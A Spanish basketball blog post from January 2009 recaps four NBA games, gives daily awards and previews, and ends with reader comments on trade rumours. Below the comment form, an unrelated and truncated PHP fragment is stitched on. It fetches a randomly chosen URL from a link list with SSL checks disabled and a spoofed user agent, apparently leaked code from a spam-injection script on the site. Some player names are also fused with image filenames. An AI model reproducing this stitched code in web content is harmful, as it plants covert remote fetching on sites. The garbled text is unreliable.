La crónica (20/1/2009)

21 de January de 2009 por MagicJohnson32

Obama.

Una vez escrita la palabra de moda en el día de ayer lo suyo es que nos centremos en lo que realmente nos interesa, aunque ni siquiera la NBA ha podido permanecer al margen de la “esperanza negra” y también le han dedicado textos, audios y vídeos. Nosotros ya hemos cumplido y ahora vamos a por la crónica del día.

Se disputaron cuatro partidos sin sorpresas, ganados por los favoritos. San Antonio ni sudó para vencer a los Pacers y Tim Duncan y Tony Parker pudieron ver el último cuarto desde la privilegiada posición que les otorga el banquillo. Fue un muy mal día de Indiana, que ya ha perdido 5 de los últimos 7 partidos.

Otros que ni sudaron fueron los Nuggets, y eso que juegan sin Carmelo Anthony. Ayer, frente a los Kings, Kleiza y Smith se disfrazaron de Melo y consiguieron sobreponerse a un primer cuarto en el que fueron superados por los jugadores de Sacramento. Definitivamente, con Billups todo es más fácil.

Las victorias de Atlanta y Utah frente Chicago y Minnessota respectivamente resultaron algo más complicadas. Mike Bibby fue el protagonista absoluto de los Hawks durante todo el partido y concretamente en los minutos finales, en los que anotó 9 importantísimos puntos. Los Hawks están notando mucho la ausencia de Horford pero ayer entre Zaza Pachulia y Josh Smith consiguieron maniatar al paupérrimo juego interior de los Bulls. Está claro que, o los Bulls realizan algún movimiento antes de la fecha límite para traspasos (Hughes está más fuera que dentro), o los Playoffs los tendrán que ver por el televisor.

Y por último, en Utah fueron necesarios 2 triples consecutivos de Okur con los Jazz 1 arriba para amarrar la victoria frente a unos Wolves desconocidos hasta el momento. El turco y Millsap tuvieron que multiplicarse para paliar la baja, mediado el segundo cuarto, de Kirilenko, lesionado en el tobillo derecho.

PREMIOS

MVP: Hoy hemos de destacar varios nombres para el galardón. El de Mike Bibby, por conducir a los Hawks al triunfo en Chicago con 31 puntos (12 de 21 en tiros con 5 triples), 6 asistencias y 5 robos; el de Manu mbibbybullsGinóbili, que logró 26 puntos en 20 minutos con sólo 10 tiros de campo y a los que añadió 8 rebotes, 3 asistencias y 2 robos; y el de Paul Millsap, que se recuperó de su última actuación con 28 puntos y 15 rebotes en la victoria de los Jazz ante los T’Wolves.

El rookie: Ni Kevin Love, que logró 12 puntos y 9 rebotes, ni Derrick Rose con sus 13 puntos, 4 asistencias y 3 rebotes hicieron sombra a Jason Thompson. El de los Kings anotó 18 puntos y atrapó 11 rebotes para ser de lo mejor de su equipo en Denver.

La sorpresa: Adivinen quién fue el máximo asistente de los Pacers anoche. ¿Dunleavy? ¿Ford? ¿Granger? ¿Jarrett Jack? Pues no: Rasho Nesterovic, que en 15 minutos dio 4 pases de canasta. Así funcionó el ataque de los Pacers en el AT&T Center de San Antonio.

La decepción: Si la temporada de Brad Miller está plagada de altibajos, lo de esta última semana ha sido una auténtica montaña rusa. Hizo 3 puntos y 2 rebotes el pasado martes ante Orlando, en los dos siguientes partidos promedió 25 puntos y 15.5 rebotes, y anoche volvió a naufragar en Denver con 2 puntos, 0 de 4 en tiros y 3 rebotes. Soplan vientos de cambio (es decir, traspaso) para Miller.

El mayor esfuerzo en vano: Este premio va para los Wolves en conjunto, que hicieron un gran partido en Salt Lake City y sólo cedieron tras dos triples consecutivos de Okur en el tramo final. Telfair, con 17 puntos y 9 asistencias, y Jefferson, con 25 puntos y 8 rebotes, fueron los más destacados entre los hombres dirigidos por McHale.

RAZONES PARA TRASNOCHAR

En una jornada con 11 partidos como es la de esta próxima madrugada, quien no encuentre razones para trasnochar es porque no quiere. Como siempre, nos centraremos en un partido y en un jugador.

Suns @ Knicks. O lo que es lo mismo: D’Antoni recibe a sus Suns. Porque por mucha voluntad que ponga yaokurPorter por cambiar la filosofía de juego, los de Arizona conservan su tendencia a, digámoslo así, relajarse en defensa. Suman ocho partidos consecutivos encajando más de 100 puntos, y tres de los últimos cuatro han sido derrotas. El partido del Madison augura puntos y morbo.

Yao Ming. Los Rockets parecen haberse adaptado a la vida sin McGrady ni Artest. Suman 5 victorias en los últimos 6 partidos y esta noche se enfrentan a su más reciente bestia negra en los Playoffs, los Jazz.  Claro que el pasado abril, Yao tenía el pie escayolado. Ahora todo el peso de la responsabilidad recae sobre él, y no siempre se ha mostrado capaz de soportarlo. ¿Podrá con Millsap y Okur?

Comenta

9 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Me extrañaría que Brad Miller y Larry Hughes acabaran la temporada en sus actuales equipos. A ver cuándo empiezan los movimientos del mercado, aunque dudo que cambien mucho las actuales perspectivas (en todo caso, los Cavs pueden reforzarse porque tienen buenos contratos y jugadores para ello).

      Citar

  2. telekoman dice:
    #2

    ¿Cuando acaba el periodo de trades?

      Citar

  3. MagicJohnson32 dice:
    #3

    El trade deadline es el jueves posterior a la celebración del All-Star Weekend. En este caso, el 19 de febrero.

      Citar

  4. Jabho dice:
    #4

    Si Brad Miller sigue en Sac no tiene sentido. Con thompson y Hawes pidiendo minutos lo suyo es que acabe en algún equipo con ciertas aspiraciones a cambio de algo medianamente válido a medio plazo.

    Hughes lo malo es que tiene este y otro a 12$ y 134… mucha tela para colocarlo. Pero un HinrichxBrad si tendría sentido para ambos.

    Es un pena que Kleiza no tenga mas continuidad…

      Citar

  5. Txusma dice:
    #5

    Otra opción idiota: NY va a regalar a Lee con el unico proposito de conseguir mas hueco salarial para el 2010. Hughes es una opcion?

      Citar

  6. MagicJohnson32 dice:
    #6

    Lo que se comenta últimamente es un Hughes a cambio de Bobby Simmons y Ager.

      Citar

  7. Txusma dice:
    #7

    Yo es q no le acabo de ver el sentido para los Bulls, aparte de q Ager libera 1 kilito ya este año…

      Citar

  8. Llukas 70 dice:
    #8

    Respecto a lo que ha dicho Magic sobre lo que Larry Hughes no acabe la temporada, puede ser una posiblidad. Hay muchos rumores que lo situan en New Jersey, aunque el quiere ser titular lo veria dificil con carter i harris estando ahi. Ademas se dice que chris bosh puede acabar en chicago, en el traspaso se verian involucrados Nocioni, Hinrich, Noah, Sefolosha. Segun mi punto de vista los bulls se harian con un jugaador que les puede venir muy bien en el juego interior y una de las superestrellas de la liga , ademas que se desarian del contrato de hinrich.

      Citar

  9. Viva_Dirk dice:
    #9

    La verdad es que lo han hecho fatal en los despachos de Chicago, dejaron escapar a Gasol, Zach y algun otro, después de eso tienen la tremenda suerte de pillar el Nº1, Rose ya tendrá nivel All-Star el año que viene seguro, y en toooooodo el verano no han sido capaces de colocar a Hinrich, mira que habia interiores que se traspasaban, nuevamente Zach, Camby, Brad Miller. Ahora mismo con la situación de Boozer y Gordon tienen otra oportunidad y no suenan ni rumores.

    Lo han tenido facil para moverse y se han quedado en la nada.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>